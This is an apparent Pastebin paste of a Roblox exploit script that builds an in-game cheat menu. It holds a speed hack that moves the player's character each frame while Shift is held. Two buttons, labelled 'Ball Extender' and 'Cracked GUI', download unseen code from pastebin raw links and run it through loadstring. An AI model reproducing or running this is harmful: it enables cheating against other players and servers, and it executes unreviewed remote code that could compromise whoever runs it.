Legend_HandlesYT

Untitled

May 26th, 2021
4,264
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.88 KB | None | 0 0
  1. -- Made By Legend HandlesYT Go SUB!
  2. -- Version: 1
  3.  
  4. -- Script!:
  5.  
  6. local GuiMenuDRAGTHISINTOSTARTERGUI = Instance.new("ScreenGui")
  7. local Frame = Instance.new("Frame")
  8. local Menu = Instance.new("Frame")
  9. local MenuButton = Instance.new("TextButton")
  10. local ShopAndInfoBar = Instance.new("Frame")
  11. local Close = Instance.new("Frame")
  12. local Close_2 = Instance.new("TextButton")
  13. local Shop = Instance.new("TextButton")
  14. local Shop_2 = Instance.new("TextButton")
  15. local Shop_3 = Instance.new("TextButton")
  16. local TextLabel = Instance.new("TextLabel")
  17. local ImageLabel = Instance.new("ImageLabel")
  18. local ImageLabel_2 = Instance.new("ImageLabel")
  19. local Info = Instance.new("Frame")
  20. local Close_3 = Instance.new("TextButton")
  21. local Line1 = Instance.new("TextLabel")
  22. local Title = Instance.new("TextLabel")
  23. local Shop_4 = Instance.new("Frame")
  24. local Close_4 = Instance.new("TextButton")
  25. local Admin = Instance.new("Frame")
  26. local ImageLabel_3 = Instance.new("ImageLabel")
  27. local Buy = Instance.new("TextButton")
  28. local PassTitle = Instance.new("TextLabel")
  29. local TextLabel_2 = Instance.new("TextLabel")
  30.  
  31. --Properties:
  32.  
  33. GuiMenuDRAGTHISINTOSTARTERGUI.Name = "Gui Menu (DRAG THIS INTO STARTERGUI)"
  34. GuiMenuDRAGTHISINTOSTARTERGUI.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  35.  
  36. Frame.Parent = GuiMenuDRAGTHISINTOSTARTERGUI
  37. Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  38. Frame.BackgroundTransparency = 1.000
  39. Frame.Size = UDim2.new(1, 0, 1, 0)
  40.  
  41. Menu.Name = "Menu"
  42. Menu.Parent = Frame
  43. Menu.BackgroundColor3 = Color3.fromRGB(61, 184, 0)
  44. Menu.Position = UDim2.new(0.457819909, 0, 1, -75)
  45. Menu.Size = UDim2.new(0, 150, 0, 75)
  46. Menu.Style = Enum.FrameStyle.RobloxRound
  47.  
  48. MenuButton.Name = "MenuButton"
  49. MenuButton.Parent = Menu
  50. MenuButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  51. MenuButton.Size = UDim2.new(0, 134, 0, 58)
  52. MenuButton.Font = Enum.Font.SourceSans
  53. MenuButton.Text = "Legend Handles Rb World GUI (Open)"
  54. MenuButton.TextScaled = true
  55. MenuButton.TextSize = 14.000
  56. MenuButton.TextWrapped = true
  57.  
  58. ShopAndInfoBar.Name = "ShopAndInfoBar"
  59. ShopAndInfoBar.Parent = Frame
  60. ShopAndInfoBar.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  61. ShopAndInfoBar.Position = UDim2.new(0.254421532, 0, 0.311897099, -75)
  62. ShopAndInfoBar.Size = UDim2.new(0, 303, 0, 232)
  63. ShopAndInfoBar.Visible = false
  64. ShopAndInfoBar.Style = Enum.FrameStyle.RobloxRound
  65.  
  66. Close.Name = "Close"
  67. Close.Parent = ShopAndInfoBar
  68. Close.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  69. Close.Position = UDim2.new(0.303300351, 6, 0.46842742, 67)
  70. Close.Size = UDim2.new(0, 100, 0, 45)
  71. Close.Style = Enum.FrameStyle.RobloxSquare
  72.  
  73. Close_2.Name = "Close"
  74. Close_2.Parent = Close
  75. Close_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  76. Close_2.Position = UDim2.new(0, 0, 0.0444444418, 0)
  77. Close_2.Size = UDim2.new(0, 84, 0, 28)
  78. Close_2.AutoButtonColor = false
  79. Close_2.Font = Enum.Font.SourceSans
  80. Close_2.Text = "Close"
  81. Close_2.TextScaled = true
  82. Close_2.TextSize = 14.000
  83. Close_2.TextWrapped = true
  84.  
  85. Shop.Name = "Shop"
  86. Shop.Parent = ShopAndInfoBar
  87. Shop.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  88. Shop.Position = UDim2.new(-0.0132013261, 0, -0.0120670991, 0)
  89. Shop.Size = UDim2.new(0, 134, 0, 58)
  90. Shop.Font = Enum.Font.SourceSans
  91. Shop.Text = "Shift to Sprint (Hold Shift)"
  92. Shop.TextScaled = true
  93. Shop.TextSize = 14.000
  94. Shop.TextWrapped = true
  95.  
  96. Shop_2.Name = "Shop"
  97. Shop_2.Parent = ShopAndInfoBar
  98. Shop_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  99. Shop_2.Position = UDim2.new(-0.0132013205, 0, 0.261146486, 0)
  100. Shop_2.Size = UDim2.new(0, 134, 0, 58)
  101. Shop_2.Font = Enum.Font.SourceSans
  102. Shop_2.Text = "Ball Extender (Press q and press r to turn off)"
  103. Shop_2.TextScaled = true
  104. Shop_2.TextSize = 14.000
  105. Shop_2.TextWrapped = true
  106.  
  107. Shop_3.Name = "Shop"
  108. Shop_3.Parent = ShopAndInfoBar
  109. Shop_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  110. Shop_3.Position = UDim2.new(0.462046236, 0, 0.0913811773, 0)
  111. Shop_3.Size = UDim2.new(0, 134, 0, 58)
  112. Shop_3.Font = Enum.Font.SourceSans
  113. Shop_3.Text = "Cracked GUI"
  114. Shop_3.TextScaled = true
  115. Shop_3.TextSize = 14.000
  116. Shop_3.TextWrapped = true
  117.  
  118. TextLabel.Parent = ShopAndInfoBar
  119. TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  120. TextLabel.Position = UDim2.new(0.148514852, 0, 0.543103397, 0)
  121. TextLabel.Size = UDim2.new(0, 200, 0, 50)
  122. TextLabel.Font = Enum.Font.SourceSans
  123. TextLabel.Text = "Made By Legend HandlesYT Go sub to him!"
  124. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  125. TextLabel.TextScaled = true
  126. TextLabel.TextSize = 14.000
  127. TextLabel.TextWrapped = true
  128.  
  129. ImageLabel.Parent = ShopAndInfoBar
  130. ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  131. ImageLabel.BackgroundTransparency = 1.000
  132. ImageLabel.Position = UDim2.new(-0.032796327, 0, 0.583828807, 0)
  133. ImageLabel.Size = UDim2.new(0, 85, 0, 97)
  134. ImageLabel.Image = "http://www.roblox.com/asset/?id=6864604891"
  135.  
  136. ImageLabel_2.Parent = ShopAndInfoBar
  137. ImageLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  138. ImageLabel_2.BackgroundTransparency = 1.000
  139. ImageLabel_2.Position = UDim2.new(0.726279557, 0, 0.583828807, 0)
  140. ImageLabel_2.Size = UDim2.new(0, 85, 0, 97)
  141. ImageLabel_2.Image = "http://www.roblox.com/asset/?id=6864604891"
  142.  
  143. Info.Name = "Info"
  144. Info.Parent = Frame
  145. Info.BackgroundColor3 = Color3.fromRGB(61, 184, 0)
  146. Info.Position = UDim2.new(0.801421821, -250, 0.891167164, -150)
  147. Info.Size = UDim2.new(0, 182, 0, 52)
  148. Info.Visible = false
  149. Info.Style = Enum.FrameStyle.RobloxRound
  150.  
  151. Close_3.Name = "Close"
  152. Close_3.Parent = Info
  153. Close_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  154. Close_3.Position = UDim2.new(0, 0, 0, 228)
  155. Close_3.Size = UDim2.new(0, 484, 0, 58)
  156. Close_3.Font = Enum.Font.SourceSans
  157. Close_3.Text = "Close"
  158. Close_3.TextColor3 = Color3.fromRGB(20, 20, 20)
  159. Close_3.TextScaled = true
  160. Close_3.TextSize = 14.000
  161. Close_3.TextWrapped = true
  162.  
  163. Line1.Name = "Line1"
  164. Line1.Parent = Info
  165. Line1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  166. Line1.BackgroundTransparency = 1.000
  167. Line1.Position = UDim2.new(0.00499999989, 0, 0.25, 0)
  168. Line1.Size = UDim2.new(0, 480, 0, 150)
  169. Line1.Font = Enum.Font.SourceSans
  170. Line1.Text = "Write your text here!"
  171. Line1.TextColor3 = Color3.fromRGB(255, 255, 255)
  172. Line1.TextSize = 24.000
  173. Line1.TextWrapped = true
  174. Line1.TextYAlignment = Enum.TextYAlignment.Top
  175.  
  176. Title.Name = "Title"
  177. Title.Parent = Info
  178. Title.BackgroundColor3 = Color3.fromRGB(61, 184, 0)
  179. Title.BackgroundTransparency = 1.000
  180. Title.Size = UDim2.new(0, 484, 0, 58)
  181. Title.Font = Enum.Font.SourceSans
  182. Title.Text = "Info"
  183. Title.TextColor3 = Color3.fromRGB(255, 255, 255)
  184. Title.TextSize = 48.000
  185. Title.TextWrapped = true
  186.  
  187. Shop_4.Name = "Shop"
  188. Shop_4.Parent = Frame
  189. Shop_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  190. Shop_4.Position = UDim2.new(0.5, -250, 0.5, -250)
  191. Shop_4.Size = UDim2.new(0, 500, 0, 500)
  192. Shop_4.Visible = false
  193. Shop_4.Style = Enum.FrameStyle.RobloxRound
  194.  
  195. Close_4.Name = "Close"
  196. Close_4.Parent = Shop_4
  197. Close_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  198. Close_4.Position = UDim2.new(0, 0, 0, 428)
  199. Close_4.Size = UDim2.new(0, 484, 0, 58)
  200. Close_4.Font = Enum.Font.SourceSans
  201. Close_4.Text = "Close"
  202. Close_4.TextColor3 = Color3.fromRGB(25, 25, 25)
  203. Close_4.TextScaled = true
  204. Close_4.TextSize = 14.000
  205. Close_4.TextWrapped = true
  206.  
  207. Admin.Name = "Admin"
  208. Admin.Parent = Shop_4
  209. Admin.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  210. Admin.BackgroundTransparency = 1.000
  211. Admin.Size = UDim2.new(0, 100, 0, 100)
  212.  
  213. ImageLabel_3.Parent = Admin
  214. ImageLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  215. ImageLabel_3.Position = UDim2.new(0, 0, 0, 70)
  216. ImageLabel_3.Size = UDim2.new(0, 150, 0, 150)
  217. ImageLabel_3.Image = "rbxassetid://5774069036"
  218.  
  219. Buy.Name = "Buy"
  220. Buy.Parent = Admin
  221. Buy.BackgroundColor3 = Color3.fromRGB(170, 85, 0)
  222. Buy.Position = UDim2.new(0, 160, 0, 150)
  223. Buy.Size = UDim2.new(0, 325, 0, 60)
  224. Buy.Font = Enum.Font.SourceSansBold
  225. Buy.Text = "Buy! Admin"
  226. Buy.TextColor3 = Color3.fromRGB(255, 255, 255)
  227. Buy.TextSize = 36.000
  228. Buy.TextWrapped = true
  229.  
  230. PassTitle.Name = "PassTitle"
  231. PassTitle.Parent = Admin
  232. PassTitle.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  233. PassTitle.BackgroundTransparency = 1.000
  234. PassTitle.Position = UDim2.new(0, 160, 0, 70)
  235. PassTitle.Size = UDim2.new(0, 325, 0, 60)
  236. PassTitle.Font = Enum.Font.SourceSans
  237. PassTitle.Text = "Admin"
  238. PassTitle.TextColor3 = Color3.fromRGB(255, 255, 255)
  239. PassTitle.TextScaled = true
  240. PassTitle.TextSize = 14.000
  241. PassTitle.TextWrapped = true
  242.  
  243. TextLabel_2.Parent = Shop_4
  244. TextLabel_2.BackgroundColor3 = Color3.fromRGB(61, 184, 0)
  245. TextLabel_2.BackgroundTransparency = 1.000
  246. TextLabel_2.Size = UDim2.new(0, 484, 0, 58)
  247. TextLabel_2.Font = Enum.Font.SourceSans
  248. TextLabel_2.Text = "Gamepass Shop"
  249. TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
  250. TextLabel_2.TextScaled = true
  251. TextLabel_2.TextSize = 14.000
  252. TextLabel_2.TextWrapped = true
  253.  
  254. -- Scripts:
  255.  
  256. local function XEFD_fake_script() -- MenuButton.LocalScript
  257. local script = Instance.new('LocalScript', MenuButton)
  258.  
  259. local menu = script.Parent.Parent
  260.  
  261.  
  262. script.Parent.MouseButton1Down:connect(function()
  263. menu.Parent.ShopAndInfoBar.Visible = true
  264. menu.Visible = false
  265. end)
  266.  
  267. end
  268. coroutine.wrap(XEFD_fake_script)()
  269. local function UEGMIGX_fake_script() -- Close_2.LocalScript
  270. local script = Instance.new('LocalScript', Close_2)
  271.  
  272. script.Parent.MouseButton1Down:connect(function()
  273. script.Parent.Parent.Parent.Visible = false
  274. script.Parent.Parent.Parent.Parent.Menu.Visible = true
  275. end)
  276. end
  277. coroutine.wrap(UEGMIGX_fake_script)()
  278. local function FSEGJAB_fake_script() -- Shop.LocalScript
  279. local script = Instance.new('LocalScript', Shop)
  280.  
  281. function Click(mouse)
  282.  
  283. ShiftHeld = false
  284. local gcheck = true
  285. urspeed = -1 -- The lower it is the faster. So don't worry about it being minus 1
  286.  
  287.  
  288. function ChangeFaster(inputObject, gameProcessedEvent)
  289. if inputObject.KeyCode == Enum.KeyCode.Minus and gameProcessedEvent == false then
  290. urspeed = urspeed - 0.1
  291. end
  292. end
  293.  
  294.  
  295.  
  296. function ChangeSlower(inputObject, gameProcessedEvent)
  297. if inputObject.KeyCode == Enum.KeyCode.Equals and gameProcessedEvent == false then
  298. urspeed = urspeed + 0.1
  299. end
  300. end
  301.  
  302.  
  303.  
  304. function GChecker(inputObject, gameProcessedEvent)
  305. if inputObject.KeyCode == Enum.KeyCode.K and gameProcessedEvent == false then
  306. if gcheck == false then
  307. gcheck = true
  308. elseif gcheck == true then
  309. gcheck = false
  310. end
  311.  
  312. end
  313. end
  314.  
  315. game:GetService("UserInputService").InputBegan:connect(GChecker)
  316.  
  317.  
  318.  
  319. function PressShift(inputObject,gameProcessedEvent)
  320. if inputObject.KeyCode == Enum.KeyCode.LeftShift and gameProcessedEvent == false and gcheck == true then
  321. ShiftHeld = true
  322. end
  323. end
  324.  
  325. function ReleaseShift(inputObject,gameProcessed)
  326. if inputObject.KeyCode == Enum.KeyCode.LeftShift then
  327. ShiftHeld = false
  328. end
  329. end
  330.  
  331. game:GetService("UserInputService").InputBegan:connect(PressShift)
  332. game:GetService("UserInputService").InputEnded:connect(ReleaseShift)
  333. game:GetService("UserInputService").InputBegan:connect(ChangeFaster)
  334. game:GetService("UserInputService").InputBegan:connect(ChangeSlower)
  335.  
  336.  
  337. game:GetService('RunService').Stepped:connect(function()
  338. if ShiftHeld == true then
  339. game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame * CFrame.new(0,0,urspeed)
  340. end
  341. end)
  342. end
  343.  
  344.  
  345. script.Parent.MouseButton1Down:connect(Click)
  346.  
  347. end
  348. coroutine.wrap(FSEGJAB_fake_script)()
  349. local function FMVHOV_fake_script() -- Shop_2.LocalScript
  350. local script = Instance.new('LocalScript', Shop_2)
  351.  
  352. function Click(mouse)
  353.  
  354. loadstring(game:HttpGet(("https://pastebin.com/raw/u7sQ2UZs"), true))()
  355. end
  356.  
  357.  
  358. script.Parent.MouseButton1Down:connect(Click)
  359.  
  360. end
  361. coroutine.wrap(FMVHOV_fake_script)()
  362. local function BAXH_fake_script() -- Shop_3.LocalScript
  363. local script = Instance.new('LocalScript', Shop_3)
  364.  
  365. function Click(mouse)
  366.  
  367. loadstring(game:HttpGet(("https://pastebin.com/raw/ECwCATRK"), true))()
  368. end
  369.  
  370.  
  371. script.Parent.MouseButton1Down:connect(Click)
  372.  
  373. end
  374. coroutine.wrap(BAXH_fake_script)()
  375. local function EQOXGD_fake_script() -- Close_3.LocalScript
  376. local script = Instance.new('LocalScript', Close_3)
  377.  
  378. script.Parent.MouseButton1Down:connect(function()
  379. script.Parent.Parent.Visible = false
  380.  
  381.  
  382. end)
  383.  
  384. end
  385. coroutine.wrap(EQOXGD_fake_script)()
  386. local function CDKZS_fake_script() -- Close_4.LocalScript
  387. local script = Instance.new('LocalScript', Close_4)
  388.  
  389. script.Parent.MouseButton1Down:connect(function()
  390. script.Parent.Parent.Visible = false
  391.  
  392.  
  393. end)
  394.  
  395. end
  396. coroutine.wrap(CDKZS_fake_script)()
  397. local function ONFQTY_fake_script() -- Buy.Change me
  398. local script = Instance.new('LocalScript', Buy)
  399.  
  400. id = 12229935
  401. player = game.Players.LocalPlayer
  402.  
  403. script.Parent.MouseButton1Click:connect(function()
  404. game:GetService("MarketplaceService"):PromptPurchase(player,id)
  405. end)
  406.  
  407. end
  408. coroutine.wrap(ONFQTY_fake_script)()
  409. -- Shop_4.READ ME is disabled.
  410.  
Add Comment
Please, Sign In to add comment